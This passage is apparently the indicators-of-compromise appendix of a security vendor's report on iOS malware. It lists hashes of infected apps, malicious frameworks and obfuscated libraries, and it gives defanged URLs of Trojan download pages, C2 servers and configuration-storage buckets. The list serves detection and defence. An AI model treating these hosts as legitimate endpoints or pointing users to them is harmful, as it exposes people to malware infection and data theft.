  1130. <a href="https://opentip.kaspersky.com/3734e845657c37ee849618e2b4476bf4/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______4c43193aa1426adc&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">3734e845657c37ee849618e2b4476bf4</a><br />
  1131. <a href="https://opentip.kaspersky.com/fa0e99bac48bc60aa0ae82bc0fd1698d/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______3bf106331906e5ff&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">fa0e99bac48bc60aa0ae82bc0fd1698d</a><br />
  1132. <a href="https://opentip.kaspersky.com/e9f7d9bc988e7569f999f0028b359720/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______31ffc05fe19b65f6&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">e9f7d9bc988e7569f999f0028b359720</a><br />
  1133. <a href="https://opentip.kaspersky.com/a44cbed18dc5d7fff11406cc403224b9/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______719aa450549bac89&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">a44cbed18dc5d7fff11406cc403224b9</a><br />
  1134. <a href="https://opentip.kaspersky.com/2dc565c067e60a1a9656b9a5765db11d/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______187e82e8228ecd99&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">2dc565c067e60a1a9656b9a5765db11d</a><br />
  1135. <a href="https://opentip.kaspersky.com/66434dd4402dfe7dda81f834c4b70a82/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______bb67a7ebf9bb05b1&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">66434dd4402dfe7dda81f834c4b70a82</a><br />
  1136. <a href="https://opentip.kaspersky.com/d851b19b5b587f202795e10b72ced6e1/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______1aca3f74a34b84ed&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">d851b19b5b587f202795e10b72ced6e1</a><br />
  1137. <a href="https://opentip.kaspersky.com/ce49a90c0a098e8737e266471d323626/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b6904a0bd5e02f62&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">ce49a90c0a098e8737e266471d323626</a><br />
  1138. <a href="https://opentip.kaspersky.com/cc919d4bbd3fb2098d1aeb516f356cca/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______df77107ae4076902&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">cc919d4bbd3fb2098d1aeb516f356cca</a><br />
  1139. <a href="https://opentip.kaspersky.com/530a5aa62fdcca7a8b4f60048450da70/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______a0b13fd456d85558&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">530a5aa62fdcca7a8b4f60048450da70</a><br />
  1140. <a href="https://opentip.kaspersky.com/0993bae47c6fb3e885f34cb9316717a3/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______49b9e36edcb430af&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">0993bae47c6fb3e885f34cb9316717a3</a><br />
  1141. <a href="https://opentip.kaspersky.com/5e15b25f07020a5314f0068b474fff3d/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______497f04e4ed204344&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">5e15b25f07020a5314f0068b474fff3d</a><br />
  1142. <a href="https://opentip.kaspersky.com/1346f987f6aa1db5e6deb59af8e5744a/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______963ce0abef88e694&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">1346f987f6aa1db5e6deb59af8e5744a</a></p>
  1143. <h3 id="infected-ios-apps">Infected iOS apps</h3>
  1144. <p><a href="https://opentip.kaspersky.com/21ef7a14fee3f64576f5780a637c57d1/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______72b707efee353f6e&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">21ef7a14fee3f64576f5780a637c57d1</a><br />
  1145. <a href="https://opentip.kaspersky.com/6d39cd8421591fbb0cc2a0bce4d0357d/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______932c1d75719d1dc4&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">6d39cd8421591fbb0cc2a0bce4d0357d</a><br />
  1146. <a href="https://opentip.kaspersky.com/c6a7568134622007de026d22257502d5/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______f808c83a58b2dd32&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">c6a7568134622007de026d22257502d5</a><br />
  1147. <a href="https://opentip.kaspersky.com/307a64e335065c00c19e94c1f0a896f2/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______7b9b2de644226ee2&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">307a64e335065c00c19e94c1f0a896f2</a><br />
  1148. <a href="https://opentip.kaspersky.com/fe0868c4f40cbb42eb58af121570e64d/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______04ad60f37ac2f017&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">fe0868c4f40cbb42eb58af121570e64d</a><br />
  1149. <a href="https://opentip.kaspersky.com/f9ab4769b63a571107f2709b5b14e2bc/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______7e694331af23edf1&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">f9ab4769b63a571107f2709b5b14e2bc</a><br />
  1150. <a href="https://opentip.kaspersky.com/2b43b8c757c872a19a30dcdcff45e4d8/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______78ac6594b83a7cdc&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">2b43b8c757c872a19a30dcdcff45e4d8</a><br />
  1151. <a href="https://opentip.kaspersky.com/0aa1f8f36980f3dfe8884f1c6f5d6ddc/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______234d7d0fa0eb5d2c&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">0aa1f8f36980f3dfe8884f1c6f5d6ddc</a><br />
  1152. <a href="https://opentip.kaspersky.com/a4cca2431aa35bb68581a4e848804598/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______dd14c69a1626175b&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">a4cca2431aa35bb68581a4e848804598</a><br />
  1153. <a href="https://opentip.kaspersky.com/e5186be781f870377b6542b3cecfb622/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______689db3b02fa079fd&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">e5186be781f870377b6542b3cecfb622</a><br />
  1154. <a href="https://opentip.kaspersky.com/2d2b25279ef9365420acec120b98b3b4/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______5583c27e6bbf4eb6&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">2d2b25279ef9365420acec120b98b3b4</a><br />
  1155. <a href="https://opentip.kaspersky.com/149785056bf16a9c6964c0ea4217b42b/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______8097d831d14a7ee5&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">149785056bf16a9c6964c0ea4217b42b</a><br />
  1156. <a href="https://opentip.kaspersky.com/931399987a261df91b21856940479634/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______09dae22d883f2af7&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">931399987a261df91b21856940479634</a></p>
  1157. <h3 id="malicious-ios-frameworks">Malicious iOS frameworks</h3>
  1158. <p><a href="https://opentip.kaspersky.com/8c9a93e829cba8c4607a7265e6988646/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______e45cc5988885d936&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">8c9a93e829cba8c4607a7265e6988646</a><br />
  1159. <a href="https://opentip.kaspersky.com/b3085cd623b57fd6561e964d6fd73413/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______83f1044c06f6f1ac&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">b3085cd623b57fd6561e964d6fd73413</a><br />
  1160. <a href="https://opentip.kaspersky.com/44bc648d1c10bc88f9b6ad78d3e3f967/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______54819bbba8750d6c&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">44bc648d1c10bc88f9b6ad78d3e3f967</a><br />
  1161. <a href="https://opentip.kaspersky.com/0d7ed6df0e0cd9b5b38712d17857c824/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______afa1d9fda9bd991b&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">0d7ed6df0e0cd9b5b38712d17857c824</a><br />
  1162. <a href="https://opentip.kaspersky.com/b0eda03d7e4265fe280360397c042494/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b26ec96c3d9f9886&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">b0eda03d7e4265fe280360397c042494</a><br />
  1163. <a href="https://opentip.kaspersky.com/fd4558a9b629b5abe65a649b57bef20c/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______556f80c3f5173542&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">fd4558a9b629b5abe65a649b57bef20c</a><br />
  1164. <a href="https://opentip.kaspersky.com/1b85522b964b38de67c5d2b670bb30b1/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b972f9ec924bbe98&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">1b85522b964b38de67c5d2b670bb30b1</a><br />
  1165. <a href="https://opentip.kaspersky.com/ec068e0fc6ffda97685237d8ab8a0f56/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______8033b415de640701&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">ec068e0fc6ffda97685237d8ab8a0f56</a><br />
  1166. <a href="https://opentip.kaspersky.com/f10a4fdffc884089ae93b0372ff9d5d1/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______22ab03039277bcaa&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">f10a4fdffc884089ae93b0372ff9d5d1</a><br />
  1167. <a href="https://opentip.kaspersky.com/3388b5ea9997328eb48977ab351ca8de/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______0003e79d307fdf8b&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">3388b5ea9997328eb48977ab351ca8de</a><br />
  1168. <a href="https://opentip.kaspersky.com/931085b04c0b6e23185025b69563d2ce/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______2f698af240bc2b51&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">931085b04c0b6e23185025b69563d2ce</a><br />
  1169. <a href="https://opentip.kaspersky.com/7e6324efc3acdb423f8e3b50edd5c5e5/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______4f7345241e841e6d&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">7e6324efc3acdb423f8e3b50edd5c5e5</a><br />
  1170. <a href="https://opentip.kaspersky.com/8cfc8081559008585b4e4a23cd4e1a7f/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______c7e594588078df73&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">8cfc8081559008585b4e4a23cd4e1a7f</a></p>
  1171. <h3 id="obfuscated-malicious-ios-libraries">Obfuscated malicious iOS libraries</h3>
  1172. <p><a href="https://opentip.kaspersky.com/0b7891114d3b322ee863e4eef94d8523/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______9377ae996c980a6a&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">0b7891114d3b322ee863e4eef94d8523</a><br />
  1173. <a href="https://opentip.kaspersky.com/0d09c4f956bb734586cee85887ed5407/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______86441942068f881f&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">0d09c4f956bb734586cee85887ed5407</a><br />
  1174. <a href="https://opentip.kaspersky.com/2accfc13aaf4fa389149c0a03ce0ee4b/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______841f84f72769b525&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">2accfc13aaf4fa389149c0a03ce0ee4b</a><br />
  1175. <a href="https://opentip.kaspersky.com/5b2e4ea7ab929c766c9c7359995cdde0/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______24f37156f1178593&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">5b2e4ea7ab929c766c9c7359995cdde0</a><br />
  1176. <a href="https://opentip.kaspersky.com/5e47604058722dae03f329a2e6693485/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______02f6f896fe385e3a&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">5e47604058722dae03f329a2e6693485</a><br />
  1177. <a href="https://opentip.kaspersky.com/9aeaf9a485a60dc3de0b26b060bc8218/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______a2eb89c09f5c831f&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">9aeaf9a485a60dc3de0b26b060bc8218</a><br />
  1178. <a href="https://opentip.kaspersky.com/21a257e3b51561e5ff20005ca8f0da65/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______73722979d670ba19&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">21a257e3b51561e5ff20005ca8f0da65</a><br />
  1179. <a href="https://opentip.kaspersky.com/0752edcf5fd61b0e4a1e01371ba605fd/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______665133434d360b0c&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">0752edcf5fd61b0e4a1e01371ba605fd</a><br />
  1180. <a href="https://opentip.kaspersky.com/489217cca81823af56d141c985bb9b2c/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______0609d31a798a3737&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">489217cca81823af56d141c985bb9b2c</a><br />
  1181. <a href="https://opentip.kaspersky.com/b0976d46970314532bc118f522bb8a6f/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______907fedd1e44b4077&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">b0976d46970314532bc118f522bb8a6f</a><br />
  1182. <a href="https://opentip.kaspersky.com/f0460bdca0f04d3bd4fc59d73b52233b/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______d72729c2f247a961&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">f0460bdca0f04d3bd4fc59d73b52233b</a><br />
  1183. <a href="https://opentip.kaspersky.com/f0815908bafd88d71db660723b65fba4/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______12a62cdd551e6f67&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">f0815908bafd88d71db660723b65fba4</a><br />
  1184. <a href="https://opentip.kaspersky.com/6fe6885b8f6606b25178822d7894ac35/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ab87d30d60a71964&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">6fe6885b8f6606b25178822d7894ac35</a></p>
  1185. <h3 id="download-links-for-infected-apps">Download links for infected apps</h3>
  1186. <p><a href="https://opentip.kaspersky.com/https%3a%2f%2flt.laoqianf14.top%2fkjnn/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______f97f8a3a7cf6e3ca&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://lt.laoqianf14[.]top/KJnn</a><br />
  1187. <a href="https://opentip.kaspersky.com/https%3a%2f%2flt.laoqianf15.top%2fkjnn/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______35e5c5f39b02d82e&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://lt.laoqianf15[.]top/KJnn</a><br />
  1188. <a href="https://opentip.kaspersky.com/https%3a%2f%2flt.laoqianf51.top%2fkjnn/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______c5281f5ff150fb18&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://lt.laoqianf51[.]top/KJnn</a><br />
  1189. <a href="https://opentip.kaspersky.com/https%3a%2f%2fyjhjymfjnj.wyxbmh.cn%2f2kzos8%3fa45dd02ac%3dd4f42319a78b6605cabb5696bacb4677/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______be17db98193961d3&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://yjhjymfjnj.wyxbmh[.]cn/2kzos8?a45dd02ac=d4f42319a78b6605cabb5696bacb4677</a><br />
  1190. <a href="https://opentip.kaspersky.com/https%3a%2f%2fxt.xinqianf38.top%2frnzr/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______e2f45dadfecda51e&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://xt.xinqianf38[.]top/RnZr</a></p>
  1191. <h3 id="pages-distributing-trojans">Pages distributing Trojans</h3>
  1192. <p><a href="https://opentip.kaspersky.com/https%3a%2f%2faccgngrid.com/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______4c12fb7150e5c0f1&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://accgngrid[.]com</a><br />
  1193. <a href="https://opentip.kaspersky.com/https%3a%2f%2fbyteepic.vip/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______65be7022474a217c&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://byteepic[.]vip</a></p>
  1194. <h3 id="c2-and-configuration-storage">C2 and configuration storage</h3>
  1195. <p>C2:<br />
  1196. <a href="https://opentip.kaspersky.com/23.249.28.88/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______7c584064a13303bc&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">23.249.28[.]88</a><br />
  1197. <a href="https://opentip.kaspersky.com/120.79.8.107/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______f5d8a357363127ca&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">120.79.8[.]107</a><br />
  1198. <a href="https://opentip.kaspersky.com/23.249.28.200/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______72098a7960daae1f&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">23.249.28[.]200</a><br />
  1199. <a href="https://opentip.kaspersky.com/47.119.171.161/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______046145040775168b&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">47.119.171[.]161</a><br />
  1200. <a href="https://opentip.kaspersky.com/api.fxsdk.com/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______a83fb595aff96bad&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">api.fxsdk.com</a></p>
  1201. <p>Configurations<br />
  1202. <a href="https://opentip.kaspersky.com/http%3a%2f%2f120.78.239.17%3a10011%2freq.txt/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ca183ea38cc46d43&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxp://120.78.239[.]17:10011/req.txt</a><br />
  1203. <a href="https://opentip.kaspersky.com/http%3a%2f%2f39.108.186.119%3a10011%2freq.txt/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______20e8fff841afecd5&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxp://39.108.186[.]119:10011/req.txt</a><br />
  1204. <a href="https://opentip.kaspersky.com/https%3a%2f%2fdhoss-2023.oss-cn-beijing.aliyuncs.com%2fpath%2f02wbufztuvxrtmgjh7uh/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______54d93c8539163e72&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://dhoss-2023.oss-cn-beijing.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh</a><br />
  1205. <a href="https://opentip.kaspersky.com/https%3a%2f%2fsdk-data-re.oss-accelerate.aliyuncs.com%2fjmuce7txrhnxbr5nj.txt/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______1ee174513c79abfd&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://sdk-data-re.oss-accelerate.aliyuncs[.]com/JMUCe7txrHnxBr5nj.txt</a><br />
  1206. <a href="https://opentip.kaspersky.com/https%3a%2f%2fgitee.com%2fbbffipa%2fdata-group%2fraw%2fmaster%2f02wbufztuvxrtmgjh7uh/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______e3a24370965a0ca1&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://gitee[.]com/bbffipa/data-group/raw/master/02WBUfZTUvxrTMGjh7Uh</a><br />
  1207. <a href="https://opentip.kaspersky.com/https%3a%2f%2fok2025-oss.oss-cn-shenzhen.aliyuncs.com%2fip%2ffm4j7awkef8yk/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______858f9bf5cc70040d&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://ok2025-oss.oss-cn-shenzhen.aliyuncs[.]com/ip/FM4J7aWKeF8yK</a><br />
  1208. <a href="https://opentip.kaspersky.com/https%3a%2f%2ffile-ht-2023.oss-cn-shenzhen.aliyuncs.com%2fpath%2f02wbufztuvxrtmgjh7uh/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______1dabc56312afe2af&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://file-ht-2023.oss-cn-shenzhen.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh</a><br />
  1209. <a href="https://opentip.kaspersky.com/https%3a%2f%2fafwfiwjef-mgsdl-2023.oss-cn-shanghai.aliyuncs.com%2fpath%2f02wbufztuvxrtmgjh7uh/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______1a239662ac7c4ab0&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://afwfiwjef-mgsdl-2023.oss-cn-shanghai.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh</a><br />
  1210. <a href="https://opentip.kaspersky.com/https%3a%2f%2fzx-afjweiofwe.oss-cn-beijing.aliyuncs.com%2fpath%2f02wbufztuvxrtmgjh7uh/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______88b6d9e298bee511&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://zx-afjweiofwe.oss-cn-beijing.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh</a><br />
  1211. <a href="https://opentip.kaspersky.com/https%3a%2f%2fdxifjew2.oss-cn-beijing.aliyuncs.com%2fpath%2f02wbufztuvxrtmgjh7uh/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______96a647d24cc9db77&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://dxifjew2.oss-cn-beijing.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh</a><br />
  1212. <a href="https://opentip.kaspersky.com/https%3a%2f%2fsdk-data-re.oss-accelerate.aliyuncs.com%2fjmuce7txrhnxbr5nj.txt/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______1ee174513c79abfd&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://sdk-data-re.oss-accelerate.aliyuncs[.]com/JMUCe7txrHnxBr5nj.txt</a><br />
  1213. <a href="https://opentip.kaspersky.com/https%3a%2f%2fdata-sdk2.oss-accelerate.aliyuncs.com%2ffile%2fsgtmnh951121/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______2389c125d9ff745b&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://data-sdk2.oss-accelerate.aliyuncs[.]com/file/SGTMnH951121</a><br />
  1214. <a href="https://opentip.kaspersky.com/https%3a%2f%2f1111333.cn-bj.ufileos.com%2ffile%2fsgtmnh951121/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______5ef3275b8c4a2b8e&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://1111333[.]cn-bj.ufileos[.]com/file/SGTMnH951121</a><br />
  1215. <a href="https://opentip.kaspersky.com/https%3a%2f%2ftbetter-oss.oss-accelerate.aliyuncs.com%2fip%2fcf4j7awkef8ykvku/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______c7aa5d7d83bb4334&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://tbetter-oss.oss-accelerate.aliyuncs[.]com/ip/CF4J7aWKeF8yKVKu</a><br />
  1216. <a href="https://opentip.kaspersky.com/https%3a%2f%2fphoto-php-all.s3.ap-southeast-1.amazonaws.com%2fapp%2fdomain.json/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______25cca5cb055132af&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://photo-php-all.s3[.]ap-southeast-1.amazonaws[.]com/app/domain.json</a><br />
